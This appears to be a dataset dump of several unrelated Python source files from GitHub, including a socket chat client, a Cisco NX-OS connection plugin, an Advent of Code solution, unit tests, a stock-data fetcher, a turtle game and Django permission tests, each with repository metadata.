sock.recv(payload_size)\n    while len(payload) < payload_size:\n        payload += sock.recv(payload_size - len(payload))\n    return payload.decode('utf8')\n\ndef recv_loop(sock: socket.socket):\n    \"\"\"Receive text from server.\"\"\"\n    while True:\n        text = receive_text(sock)\n        if text == 'ping':\n            continue\n        print(text)\n\ndef main():\n    \"\"\"Main function.\"\"\"\n    \n    username = input('Enter your username: ')\n    \n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.connect(('localhost', 8888))\n\n    # Start receiving loop\n    threading.Thread(target=recv_loop, args=(sock,), daemon=True).start()\n\n    user_input = ''\n    while user_input != 'exit':\n        user_input = input()\n        send_text(sock, f'{username}: {user_input}')\n\n    \n    sock.close()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"waheedullahkhan001/chat-client","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"21141744382","text":"__author__ = 'Dave Wapstra <dwapstra@cisco.com>'\n\nimport re\n\nfrom unicon.plugins.nxos import NxosSingleRpConnectionProvider, NxosDualRpConnectionProvider\nfrom unicon.eal.dialogs import Dialog, Statement\nfrom unicon.plugins.nxos.utils import NxosUtils\nfrom unicon.plugins.generic.statements import more_prompt_handler\nfrom unicon.plugins.generic.patterns import GenericPatterns\n\nutils = NxosUtils()\ngeneric_patterns = GenericPatterns()\n\n\nclass Nxos7kSingleRpConnectionProvider(NxosSingleRpConnectionProvider):\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        # in case device is on a vdc, this should be updated.\n        self.connection.current_vdc = None\n\n    def establish_connection(self):\n        super().establish_connection()\n        con = self.connection\n        m = con.spawn.match.last_match\n\n        dialog = Dialog([\n            Statement(pattern=generic_patterns.more_prompt,\n                      action=more_prompt_handler,\n                      loop_continue=True,\n                      trim_buffer=False),\n            Statement(pattern=r'.+#\\s*$')\n        ])\n\n        hostname = m.groupdict().get('hostname00')\n        if hostname and '-' in hostname:\n            con.log.info('We may be on a VDC, checking')\n            con.sendline('show vdc')\n            dialog.process(con.spawn)\n            vdc_info = con.spawn.match.match_output\n            m = re.search(r'^1', vdc_info, re.MULTILINE)\n            if m:\n                con.log.info('Current VDC: Admin')\n            else:\n                m = re.search(r'^[2345678]\\s*(?P<vdc_name>\\S+)', vdc_info, re.MULTILINE)\n                if m:\n                    vdc_name = m.groupdict()['vdc_name']\n                    con.log.info('Current VDC {}'.format(vdc_name))\n                    con.current_vdc = vdc_name\n                    con.hostname = con.hostname.replace('-' + vdc_name, '')\n                    vdc_hostname = con.hostname + '-' + vdc_name\n                    if con.is_ha:\n                        con.active.state_machine.hostname = vdc_hostname\n                        con.standby.state_machine.hostname = vdc_hostname\n                    else:\n                        con.state_machine.hostname = vdc_hostname\n\n\nclass Nxos7kDualRpConnectionProvider(NxosDualRpConnectionProvider):\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        # in case device is on a vdc, this should be updated.\n        self.connection.current_vdc = None\n","repo_name":"CiscoTestAutomation/unicon.plugins","sub_path":"src/unicon/plugins/nxos/n7k/connection_provider.py","file_name":"connection_provider.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"57"}
{"seq_id":"1178751348","text":"# day22_part2.py\n\nfrom collections import Counter\nimport numpy as np\n\ninstructions = []\nxmagic = 0\nymagic = 0\nzmagic = 
0\nreactor = None\n\ndef lit():\n    global xmagic, ymagic, zmagic, reactor\n    lit = 0\n    for x in range(0, xmagic):\n        for y in range(0, ymagic):\n            for z in range(0, zmagic):\n                lit = lit + reactor[x,y,z]\n    return int(lit)\n\ndef correct_boundaries(b):\n    global xmagic, ymagic, zmagic\n    c = []\n    c.append(b[0] + xmagic)\n    c.append(b[1] + xmagic)\n    c.append(b[2] + ymagic)\n    c.append(b[3] + ymagic)\n    c.append(b[4] + zmagic)\n    c.append(b[5] + zmagic)\n    return c\n\ndef convert_coord(d, x):\n    global xmagic, ymagic, zmagic\n    if d == 'x':\n        return int(x) + xmagic\n    elif d == 'y':\n        return int(x) + ymagic\n    elif d == 'z':\n        return int(x) + zmagic\n    \ndef parse_input_file(file): \n    global instructions, xmagic, ymagic, zmagic, reactor\n    \n    # Max value pass\n    xmin = 0\n    ymin = 0\n    zmin = 0\n    f = open(file, \"r\")\n    for line in f:\n        l = line.rstrip('\\n')\n        status, temp = l.split(' ')\n        ranges = temp.split(',')\n        boundaries = []\n        for r in ranges:\n            d, b = r.split('=')\n            b = b.split('..')\n            if d == 'x':\n                xmin = int(b[0]) if int(b[0]) < xmin else xmin\n            if d == 'y':\n                ymin = int(b[0]) if int(b[0]) < ymin else ymin\n            if d == 'z':\n                zmin = int(b[0]) if int(b[0]) < zmin else zmin\n    xmagic = 0 if xmin > 0 else abs(xmin)\n    ymagic = 0 if ymin > 0 else abs(ymin)\n    zmagic = 0 if zmin > 0 else abs(zmin)\n    f.close()\n\n    # Fix reactor\n    reactor = np.zeros([xmagic, ymagic, zmagic], bool) # to represent -50..50 in each axis\n\n    # Import pass\n    f = open(file, \"r\")\n    for line in f:\n        l = line.rstrip('\\n')\n        status, temp = l.split(' ')\n        ranges = temp.split(',')\n        boundaries = []\n        for r in ranges:\n            d, b = r.split('=')\n            b = b.split('..')\n            boundaries.append(convert_coord(d, b[0]))\n            boundaries.append(convert_coord(d, b[1]))\n        boundaries = correct_boundaries(boundaries)\n        if boundaries:\n            instructions.append([1 if status == 'on' else 0, boundaries])\n    f.close()\n\ndef print_reactor():\n    global reactor\n    print(f'--------------------')\n    print(f'INFO > Reactor:')\n    print(reactor)\n    print(f'--------------------')\n    print(f'')\n    return\n    \ndef main(file):\n\n    global instructions, reactor\n\n    # Import input data\n    parse_input_file(file)\n    print(instructions)\n    print(reactor)\n\n    for c, i in enumerate(instructions):\n        status, affected = i\n        print(f'Step {c}...')\n        for x in range(affected[0], affected[1] + 1):\n            for y in range(affected[2], affected[3] + 1):\n                for z in range(affected[4], affected[5] + 1):\n                    reactor[x, y, z] = status\n    \n    # Cleanup\n    print_reactor()\n    print(f'Number of lit pixels: {lit()} (should be 590784)')\n    print(\"Done!\")\n\n\n# main('tiniest.txt')\nmain('tiny.txt')\n# main('test.txt')\n# main('new_test.txt')\n# main('input.txt')\n","repo_name":"jhempy/advent-of-code-2021","sub_path":"Day22/day22_part2.py","file_name":"day22_part2.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"70461740020","text":"import string\nimport random\nfrom typing import List\nfrom unittest import TestCase\n\nfrom app.dto.pipeline.icd10_annotation import ICD10Annotation\nfrom app.dto.pipeline.icd10_annotation_result import ICD10AnnotationResult\nfrom app.util.span_merger_util import SpanMergerUtil\n\n\nclass TestSpanMergerUtil(TestCase):\n    def test__get_icd_10_codes_with_relevant_spans__should_return_correct_response__given_correct_input(self):\n        mock_icd10_annotations = self.__get_dummy_icd10_annotation_result()\n        no_of_components_in_algorithm = 3\n\n        # printing lowercase\n        letters = string.ascii_lowercase\n        mock_medant_note = 
''.join(random.choice(letters) for _ in range(1000))\n\n icd10_filtered_annotations = SpanMergerUtil.get_icd_10_codes_with_relevant_spans(mock_icd10_annotations,\n no_of_components_in_algorithm,\n mock_medant_note)\n\n\n assert icd10_filtered_annotations[0].begin_offset == 0\n assert icd10_filtered_annotations[0].end_offset == 7\n\n assert icd10_filtered_annotations[1].begin_offset == 8\n assert icd10_filtered_annotations[1].end_offset == 10\n\n assert icd10_filtered_annotations[2].begin_offset == 50\n assert icd10_filtered_annotations[2].end_offset == 130\n\n assert icd10_filtered_annotations[3].begin_offset == 300\n assert icd10_filtered_annotations[3].end_offset == 900\n\n assert icd10_filtered_annotations[3].suggested_codes[0].code == 'A15.0'\n assert icd10_filtered_annotations[3].suggested_codes[1].code == 'J12.89'\n assert icd10_filtered_annotations[3].suggested_codes[2].code == 'A15.9'\n\n assert icd10_filtered_annotations[0].medical_condition == mock_medant_note[0:7]\n assert icd10_filtered_annotations[1].medical_condition == mock_medant_note[8:10]\n assert icd10_filtered_annotations[2].medical_condition == mock_medant_note[50:130]\n assert icd10_filtered_annotations[3].medical_condition == mock_medant_note[300:900]\n\n\n def __get_dummy_icd10_annotation_result(self) -> List[ICD10AnnotationResult]:\n icd10_annotation_1 = ICD10Annotation(code=\"A15.0\", description=\"Tuberculosis of lung\", score=0.7)\n icd10_annotation_2 = ICD10Annotation(code=\"A15.9\", description=\"Respiratory tuberculosis unspecified\",\n score=0.54)\n icd10_annotation_result_1 = ICD10AnnotationResult(medical_condition=\"Tuberculosis\", begin_offset=600,\n end_offset=900, is_negated=False,\n suggested_codes=[icd10_annotation_1, icd10_annotation_2],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_3 = ICD10Annotation(code=\"A15.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_4 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_2 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=460,\n end_offset=700,\n is_negated=False,\n suggested_codes=[icd10_annotation_3, icd10_annotation_4],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_5 = ICD10Annotation(code=\"A15.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_6 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_3 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=300,\n end_offset=500,\n is_negated=False,\n suggested_codes=[icd10_annotation_5, icd10_annotation_6],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_7 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_8 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_4 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=70,\n end_offset=130,\n is_negated=False,\n suggested_codes=[icd10_annotation_7, icd10_annotation_8],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_9 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_10 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_5 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=60,\n end_offset=120,\n is_negated=False,\n 
suggested_codes=[icd10_annotation_9, icd10_annotation_10],\n                                                          raw_acm_response={\"data\": \"data\"})\n\n        icd10_annotation_11 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n        icd10_annotation_12 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n                                              score=0.45)\n\n        icd10_annotation_result_6 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=50,\n                                                          end_offset=100,\n                                                          is_negated=False,\n                                                          suggested_codes=[icd10_annotation_11, icd10_annotation_12],\n                                                          raw_acm_response={\"data\": \"data\"})\n\n        icd10_annotation_13 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n        icd10_annotation_14 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n                                              score=0.45)\n\n        icd10_annotation_result_7 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=0, end_offset=7,\n                                                          is_negated=False,\n                                                          suggested_codes=[icd10_annotation_13, icd10_annotation_14],\n                                                          raw_acm_response={\"data\": \"data\"})\n\n        icd10_annotation_15 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n        icd10_annotation_16 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n                                              score=0.45)\n\n        icd10_annotation_result_8 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=8, end_offset=10,\n                                                          is_negated=False,\n                                                          suggested_codes=[icd10_annotation_15, icd10_annotation_16],\n                                                          raw_acm_response={\"data\": \"data\"})\n\n        return [icd10_annotation_result_1, icd10_annotation_result_2, icd10_annotation_result_3,  # 300 - 500, 360 - 600, 370 - 700\n                icd10_annotation_result_4, icd10_annotation_result_5, icd10_annotation_result_6,  # 300 - 500, 360 - 600, 550 - 700\n                icd10_annotation_result_7, icd10_annotation_result_8]  # 0 - 7, 8 - 10\n","repo_name":"akm-sabbir/Tracking_Changes_in_text","sub_path":"tests/util/test_span_merger_util.py","file_name":"test_span_merger_util.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"23642605105","text":"from C1_LinkedList.LNode import LNode\n\n\ndef recursive_remove_dup(head):\n    if head.next is None:\n        return head\n    pre = head\n    head.next = recursive_remove_dup(head.next)\n    pointer = head.next\n    while pointer is not None:\n        if head.data == pointer.data:\n            pre.next = pointer.next\n            pointer = pre.next\n        else:\n            pointer = pointer.next\n            pre = pre.next\n    return head\n\ndef remove_dup(head):\n    # nothing to do for an empty list or a list with no payload nodes\n    if head is None or head.next is None:\n        return\n    head.next = recursive_remove_dup(head.next)\n\nif __name__ == '__main__':\n    i = 1\n    head=LNode()\n    tmp=None\n    cur=head\n    while i<10:  # build a short demo list that contains duplicate values\n        tmp=LNode()\n        if i%2==0:\n            tmp.data=i+1\n        elif i%3==0:\n            tmp.data=i-2\n        else:\n            tmp.data=i\n        tmp.next=None\n        cur.next=tmp\n        cur=tmp\n        i+=1\n    print(\"Before removing duplicates:\")\n    cur = head.next\n    while cur is not None:\n        print(cur.data)\n        cur = cur.next\n    remove_dup(head)\n    print(\"After removing duplicates:\")\n    cur = head.next\n    while cur is not None:\n        print(cur.data)\n        cur = cur.next","repo_name":"xSandie/python_data_structure","sub_path":"C1_LinkedList/remove_dup_1_2/RecursiveDelete.py","file_name":"RecursiveDelete.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28614811861","text":"import base64\nimport datetime\nimport hashlib\nimport http\nimport time\n\nfrom collections import OrderedDict\nfrom http import HTTPStatus\n\nfrom strix import utils\n\n\nclass HTTPResponse():\n    def __init__(self, 
context=\"\"):\n self.all_http_status = self._get_all_http_status()\n self.headers = {}\n self.context = context\n self.content = \"\"\n self.status_line = \"\"\n self._cookie = http.cookies.SimpleCookie()\n self._status_code = HTTPStatus.OK.value\n self._reason_phrase = HTTPStatus.OK.name\n self._version = \"HTTP/1.1\"\n\n def _get_all_http_status(self):\n all_http_status = dict(((http_status.value, http_status.phrase) for http_status in list(http.HTTPStatus)))\n return all_http_status\n\n def set_cookie(self, name, value, domain=None, expires=None, path=\"/\", expires_days=None, **kwargs):\n if not hasattr(self, \"_cookie\"):\n self._cookie = http.cookies.SimpleCookie()\n if name in self._cookie:\n del self._new_cookie[name]\n self._cookie[name] = value\n morsel = self._cookie[name]\n if domain:\n morsel[\"domain\"] = domain\n if expires_days is not None and not expires:\n expires = datetime.datetime.utcnow() + datetime.timedelta(\n days=expires_days)\n if expires:\n expires = expires.timestamp()\n morsel[\"expires\"] = utils.format_timestamp(expires)\n if path:\n morsel[\"path\"] = path\n for k, v in kwargs.items():\n if k == 'max_age':\n k = 'max-age'\n\n # skip falsy values for httponly and secure flags because\n # SimpleCookie sets them regardless\n if k in ['httponly', 'secure'] and not v:\n continue\n\n morsel[k] = v\n\n def set_secure_cookie(self, name, value, domain=None, expires=None, path=\"/\", expires_days=14, **kwargs):\n cookie_secret = kwargs.get(\"cookie_secret\", \"\")\n if cookie_secret:\n self.set_cookie(name, gen_signed_cookie_value(value, expires_days, cookie_secret))\n else:\n pass\n\n def clear_cookie(self, name, path=\"/\", domain=None):\n \"\"\"Deletes the cookie with the given name.\n\n Due to limitations of the cookie protocol, you must pass the same\n path and domain to clear a cookie as were used when that cookie\n was set (but there is no way to find out on the server side\n which values were used for a given cookie).\n \"\"\"\n expires = datetime.datetime.utcnow() - datetime.timedelta(days=365)\n self.set_cookie(name, value=\"\", path=path, expires=expires,\n domain=domain)\n\n def set_header(self, name, value):\n self.headers[name] = value\n\n def set_status_line(self, version, http_status=HTTPStatus.OK):\n status_line_parts = {\"version\": version,\n \"status_code\": http_status.value,\n \"reason_phrase\": http_status.name}\n self.status_line = \"{version} {status_code} {reason_phrase}\\r\\n\".format(**status_line_parts)\n return self.status_line\n\n def set_version(self, version):\n self._version = version\n\n def set_status(self, status=HTTPStatus.OK):\n self._status_code = status.value\n self._reason_phrase = status.name\n\n def _get_status_line(self):\n if self._version is None:\n self._version = \"HTTP/1.1\"\n return \"{} {} {}\\r\\n\".format(*(self._version, self._status_code, self._reason_phrase))\n\n def _set_content(self, content):\n self.content = content\n\n @property\n def header_fields(self):\n headers = self.headers\n cookies = self._cookie\n headers[\"DATE\"] = utils.format_timestamp(time.time())\n headers[\"Content-Length\"] = len(self.message_body)\n headers = [\"{}: {}\".format(header, value) for header, value in headers.items()]\n if cookies:\n headers.append(cookies.output())\n headers = \"\\r\\n\".join(headers)\n return headers\n\n @property\n def message_body(self):\n if not self.context:\n self.context = \"HTTP {}: {}\\n\".format(self._status_code, self._reason_phrase)\n if self.content:\n self.context += self.content\n return 
self.context\n\n @property\n def body(self):\n status_line = self._get_status_line()\n resp_parts = {\"status_line\": status_line,\n \"header_fields\": self.header_fields,\n \"message_body\": self.message_body}\n response_data = \"{status_line}{header_fields}\\r\\n\\r\\n{message_body}\\r\\n\".format(**resp_parts)\n return response_data.encode()\n\n def redirect(self, url, permanent=False, status=None):\n \"\"\"Sends a redirect to the given (optionally relative) URL.\n \n If the ``status`` argument is specified, that value is used as the\n HTTP status code; otherwise either 301 (permanent) or 302\n (temporary) is chosen based on the ``permanent`` argument.\n The default is 302 (temporary).\n \"\"\"\n # if self._headers_written:\n # raise Exception(\"Cannot redirect after headers have been written\")\n if status is None:\n status = HTTPStatus.MOVED_PERMANENTLY if permanent else HTTPStatus.FOUND\n # else:\n # assert isinstance(status, int) and 300 <= status <= 399\n self.set_status(status)\n self.set_header(\"Location\", url)\n\n\ndef gen_signed_cookie_value(value, expires_days, cookie_secret=\"\"):\n now = datetime.datetime.now()\n expires_date = now + datetime.timedelta(days=expires_days)\n ts = int(expires_date.timestamp())\n msg = \"{}{}{}\".format(str(value), str(ts), cookie_secret)\n sign = hashlib.sha1(msg.encode()).hexdigest()\n raw_cookie_value = \"{}:{}:{}\".format(value, ts, sign)\n cookie_value = base64.b64encode(raw_cookie_value.encode())\n return cookie_value.decode()\n","repo_name":"Youxun-Zh/strix","sub_path":"strix/httplib/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":5968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71237337460","text":"import pandas as pd\nimport finnhub\nimport time\nfrom datetime import datetime, timedelta\n\n# Setup client\nfinnhub_client = finnhub.Client(api_key='cib4151r01qvsha5qnc0cib4151r01qvsha5qncg')\n\n# Define a function to get the data\ndef get_data(symbol):\n # Get company profile 2 for market cap\n profile = finnhub_client.company_profile2(symbol=symbol)\n market_cap = profile['marketCapitalization']\n\n # Get quote for previous close and open price\n quote = finnhub_client.quote(symbol)\n prev_close = quote['pc']\n open_price = quote['o']\n\n # Get basic financials for PE ratio and EPS\n financials = finnhub_client.company_basic_financials(symbol, 'all')\n pe_ratio = financials['metric']['peNormalizedAnnual']\n eps = financials['metric']['epsNormalizedAnnual']\n\n # Get stock candles for average volume calculation over past 10 days\n today = datetime.today()\n ten_days_ago = today - timedelta(days=10)\n res_10_days = finnhub_client.stock_candles(symbol, 'D', int(ten_days_ago.timestamp()), int(today.timestamp()))\n df_10_days = pd.DataFrame(res_10_days)\n average_volume = df_10_days['v'].mean()\n prev_volume = df_10_days['v'].iloc[-2] if len(df_10_days) > 1 else None\n\n # Get today's volume\n res_today = finnhub_client.stock_candles(symbol, '1', int((today - timedelta(days=1)).timestamp()), int(today.timestamp()))\n df_today = pd.DataFrame(res_today)\n today_volume = df_today['v'].sum() if not df_today.empty else 0\n\n # Get stock candles for calculating daily returns\n res = finnhub_client.stock_candles(symbol, 'D', int(ten_days_ago.timestamp()), int(today.timestamp()))\n df_candles = pd.DataFrame(res)\n df_candles['t'] = pd.to_datetime(df_candles['t'], unit='s')\n df_candles.set_index('t', inplace=True)\n df_candles['returns'] = 
df_candles['c'].pct_change()\n\n    # Calculate volatility and Sharpe Ratio\n    risk_free_rate = 0.02  # Assuming risk-free rate of 2%\n    volatility = df_candles['returns'].std() * (252 ** 0.5)  # Assuming 252 trading days in a year\n    sharpe_ratio = (df_candles['returns'].mean() - risk_free_rate) / df_candles['returns'].std() * (252 ** 0.5) if df_candles['returns'].std() != 0 else 0\n\n    return [symbol, prev_close, open_price, prev_volume, today_volume, average_volume, market_cap, pe_ratio, eps, volatility, sharpe_ratio]\n\n\nif __name__ == '__main__':\n\t# List of symbols to get data for\n\tsymbols = ['AAPL', 'MSFT', 'GOOG']\n\n\t# Fetch the data\n\tdata = [get_data(symbol) for symbol in symbols]\n\n\t# Convert to DataFrame and write to CSV\n\tdf = pd.DataFrame(data, columns=['Symbol', 'Previous Close', 'Open Price', 'Prev Day Volume', 'Today Volume', 'Avg Volume (10 days)', 'Market Cap', 'PE Ratio (ttm)', 'EPS (ttm)', 'Volatility', 'Sharpe Ratio'])\n\tdf = df.round(2)\n\tdf.to_csv('stock_data.csv', index=False)\n","repo_name":"yifeng-yu/quant-trading","sub_path":"quant_server.py","file_name":"quant_server.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16112563494","text":"import turtle\nimport random\nimport time\nimport tkinter as tk\nimport tkinter.messagebox\n\n# Screen settings\nszerokosc = 800\nwysokosc = 600\n\n# Initialize the screen\nekran = turtle.Screen()\nekran.title(\"Turtle on the road\")\nekran.setup(szerokosc, wysokosc)\nekran.bgcolor(\"green\")\n\n# Create the turtle\nzolw = turtle.Turtle()\nzolw.shape(\"turtle\")\nzolw.color(\"white\")\nzolw.penup()\nzolw.goto(0, -wysokosc/2 + 30)\nzolw.setheading(90)\n\n# Create the cars\nsamochody = []\nkolory_samochodow = [\"red\", \"blue\", \"orange\", \"yellow\", \"purple\", \"green\"]\npredkosc_samochodu = 5\n\nfor _ in range(10):\n    samochod = turtle.Turtle()\n    samochod.shape(\"square\")\n    kolor = random.choice(kolory_samochodow)\n    samochod.color(kolor)\n    samochod.penup()\n    samochod.goto(random.randint(-szerokosc//2 + 20, szerokosc//2 - 20), random.randint(-wysokosc//2 + 50, wysokosc//2 - 50))\n    samochody.append(samochod)\n\n# Score display\nwynik = 0\nwynik_pen = turtle.Turtle()\nwynik_pen.color(\"white\")\nwynik_pen.penup()\nwynik_pen.goto(-szerokosc/2 + 10, wysokosc/2 - 40)\nwynik_pen.hideturtle()\n\n# Game-over message\nkomunikat = turtle.Turtle()\nkomunikat.color(\"white\")\nkomunikat.penup()\nkomunikat.goto(0, 0)\nkomunikat.hideturtle()\n\n# Function that moves the turtle\ndef idz_do_gory():\n    y = zolw.ycor()\n    y += 20\n    zolw.sety(y)\n\n# Keyboard control of the turtle\nekran.listen()\nekran.onkeypress(idz_do_gory, \"Up\")\n\n# Collision effect\ndef efekt_kolizji():\n    zolw.color(\"red\")\n    ekran.update()\n    tk.messagebox.showinfo(\"YOU LOSE\", \"Game over\")\n    zolw.color(\"white\")\n\n# Create the \"Quit\" button once, before the game loop starts\nprzycisk_koniec = tk.Button(text=\"Quit\", command=ekran.bye)\nprzycisk_koniec_window = ekran.getcanvas().create_window(szerokosc/2 - 50, wysokosc/2 - 50, window=przycisk_koniec)\n\n# Main game loop\nwhile True:\n    ekran.update()\n\n    # Move the cars\n    for samochod in samochody:\n        x = samochod.xcor()\n        x -= predkosc_samochodu\n        samochod.setx(x)\n\n        # Collision check\n        if zolw.distance(samochod) < 20:\n            efekt_kolizji()\n            komunikat.write(\"YOU LOSE\", align=\"center\", font=(\"Arial\", 24, \"bold\"))\n            ekran.update()\n            time.sleep(2)\n            komunikat.clear()\n            zolw.goto(0, -wysokosc/2 + 30)\n            predkosc_samochodu = 5\n            wynik = 0\n            wynik_pen.clear()\n            wynik_pen.write(\"Score: {}\".format(wynik), align=\"left\", font=(\"Arial\", 16, \"normal\"))\n\n    # Check whether the turtle crossed the road\n    if zolw.ycor() > wysokosc/2 - 20:\n        zolw.goto(0, -wysokosc/2 + 30)\n        wynik += 1\n        wynik_pen.clear()\n        wynik_pen.write(\"Score: {}\".format(wynik), align=\"left\", font=(\"Arial\", 16, \"normal\"))\n\n    # Check whether a car reached the left edge of the screen\n    for samochod in samochody:\n        if samochod.xcor() < -szerokosc/2:\n            # respawn the car at the right edge at a random height\n            samochod.goto(szerokosc//2 - 20, random.randint(-wysokosc//2 + 50, wysokosc//2 - 50))\n            predkosc_samochodu += 1\n","repo_name":"sjemon17/lol","sub_path":"zolw.py","file_name":"zolw.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6208548325","text":"# -*- coding: ISO-8859-1 -*-\r\n\"\"\"\r\nBase test to be inherited by all standard tests\r\n\"\"\"\r\nfrom django.test import TestCase, Client\r\nfrom django.contrib.contenttypes.models import ContentType\r\nfrom django.contrib.auth.models import Permission\r\n\r\nfrom onyxlog.acesso.models.usuario import Usuario\r\nfrom model_mommy import mommy\r\n\r\nclass Testsbase(TestCase):\r\n    modelStandard = None\r\n    urlBase = None\r\n    fieldTestRender = None\r\n    dataInsert = None\r\n    modelPost = None\r\n    modelRow = None\r\n    modelMommy = None\r\n    \r\n    def setUp(self):\r\n        self.data = {\r\n            'username' : 'testuser',\r\n            'senha' : 'testpass',\r\n            'email' : 'test@test.com'\r\n        }\r\n        self.user = Usuario.objects.create_user(self.data['username'], self.data['email'], self.data['senha'])\r\n        self.client.login(username=self.data['username'], password=self.data['senha'])\r\n\r\n    def test_permissions(self):\r\n        \"\"\"\r\n        Tests that access permissions are enforced\r\n        \"\"\"\r\n        if not self.urlBase is None:\r\n            # Insert test\r\n            response = self.client.get(self.urlBase+'formulario/')\r\n            self.assertEquals(response.status_code, 403)\r\n\r\n            # Create data\r\n            self.prepare_to_post('test_permissions')\r\n\r\n            # Update test\r\n            response = self.client.post(self.urlBase+str(self.modelRow.id)+'/', self.modelPost)\r\n            self.assertEquals(response.status_code, 403)\r\n\r\n            # Delete test\r\n            response = self.client.post(self.urlBase+'remove/'+str(self.modelRow.id)+'/',{})\r\n            self.assertEquals(response.status_code, 403)\r\n\r\n    def addPermissions(self):\r\n        \"\"\"\r\n        Adds permissions to the user\r\n        \"\"\"\r\n        # look up the model's content type\r\n        if not self.modelStandard is None:\r\n            model = self.modelStandard()\r\n            contentItem = ContentType.objects.get(app_label=model._meta.app_label,model=model.__class__.__name__.lower())\r\n            # fetch the model's permissions\r\n            if not contentItem:\r\n                self.assertTrue(False)\r\n\r\n            permissions = Permission.objects.all().filter(content_type=contentItem.id)\r\n            \r\n            for permission in permissions:\r\n                self.user.user_permissions.add(permission)\r\n\r\n    def test_render_listpage(self):\r\n        \"\"\"\r\n        Tests rendering of the list page\r\n        \"\"\"\r\n        # Request the page\r\n        if not self.urlBase is None:\r\n            response = self.client.get(self.urlBase)\r\n            self.assertEquals(response.status_code, 200)\r\n\r\n    def test_return_data_to_list(self):\r\n        \"\"\"\r\n        Tests that data is returned as JSON\r\n        \"\"\"\r\n        # Request the page\r\n        if not self.urlBase is None:\r\n            response = self.client.get(self.urlBase+'data/')\r\n            self.assertContains(response, '\"result\": \"ok\"', status_code=200)\r\n\r\n    def prepare_to_post(self, 
fromDef):\r\n        \"\"\"\r\n        Prepares the data for testing POST requests\r\n        \"\"\"\r\n        if fromDef == 'test_insert':\r\n            self.modelPost = self.dataInsert\r\n        else:\r\n            self.modelRow = mommy.make(self.modelMommy)\r\n            self.modelPost = self.dataInsert\r\n\r\n    def test_insert(self):\r\n        \"\"\"\r\n        Tests rendering of the creation form\r\n        \"\"\"\r\n        self.addPermissions()\r\n        # Request the page\r\n        if not self.urlBase is None:\r\n            response = self.client.get(self.urlBase+'formulario/')\r\n            self.assertEquals(response.status_code, 200)\r\n            self.assertContains(response, 'name=\"'+self.fieldTestRender+'\"', status_code=200)\r\n\r\n        \"\"\"\r\n        Tests that data is saved by the creation POST\r\n        \"\"\"\r\n        \r\n        # Request the page\r\n        if not self.urlBase is None:\r\n            self.prepare_to_post('test_insert')\r\n            response = self.client.post(self.urlBase+'formulario/', self.modelPost)\r\n            self.assertContains(response, '\"success\": true', status_code=200)\r\n\r\n    def test_update(self):\r\n        \"\"\"\r\n        Tests POSTing the edit form\r\n        \"\"\"\r\n        \r\n        # Request the page\r\n        if not self.urlBase is None:\r\n            self.addPermissions()\r\n            self.prepare_to_post('test_update')\r\n            response = self.client.post(self.urlBase+str(self.modelRow.id)+'/', self.modelPost)\r\n            self.assertContains(response, '\"success\": true', status_code=200)\r\n\r\n    def test_delete(self):\r\n        \"\"\"\r\n        Tests deletion\r\n        \"\"\"\r\n        # Request the page\r\n        if not self.urlBase is None:\r\n            self.addPermissions()\r\n            self.prepare_to_post('test_delete')\r\n\r\n            if not self.modelRow:\r\n                self.assertTrue(False)\r\n\r\n            totalBefore = self.modelStandard.objects.count()\r\n            response = 